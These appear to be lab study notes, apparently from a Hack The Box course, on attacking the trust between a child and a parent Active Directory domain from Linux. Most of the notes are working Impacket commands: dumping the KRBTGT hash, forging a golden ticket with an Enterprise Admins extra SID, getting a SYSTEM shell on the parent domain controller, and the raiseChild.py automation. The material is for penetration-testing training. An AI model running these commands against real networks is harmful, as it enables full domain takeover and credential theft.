attacking-domain-trusts-child-parent-trusts-from-linux

I. Prerequisites

To perform this attack, the following information is required:

• KRBTGT hash for the child domain.

• SID for the child domain.

• Target user name (can be non-existent).

• FQDN of the child domain.

• SID of the Enterprise Admins group of the root domain.

---

II. Steps

1. Obtain KRBTGT hash

Use secretsdump.py from Impacket.

Command:

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

2. Obtain SID for child domain

Use lookupsid.py from Impacket.

Commands:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240

Filter to get only the Domain SID:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

3. Obtain SID for Enterprise Admins group

Use lookupsid.py targeting the parent domain's DC.

Command:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

4. Construct Golden Ticket

Use ticketer.py from Impacket.

Command:

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

5. Set KRB5CCNAME environment variable

Command:

export KRB5CCNAME=hacker.ccache

6. Gain SYSTEM shell on parent domain DC

Use psexec.py from Impacket.

Command:

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

7. Automate with raiseChild.py

Command:

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

---

III. Important Considerations

• raiseChild.py automates the process, but understanding the manual steps is crucial for troubleshooting.

• Using "autopwn" scripts in client environments requires caution.

• A thorough understanding of the underlying tools is paramount.

• Impacket is a powerful suite of tools that should be used responsibly.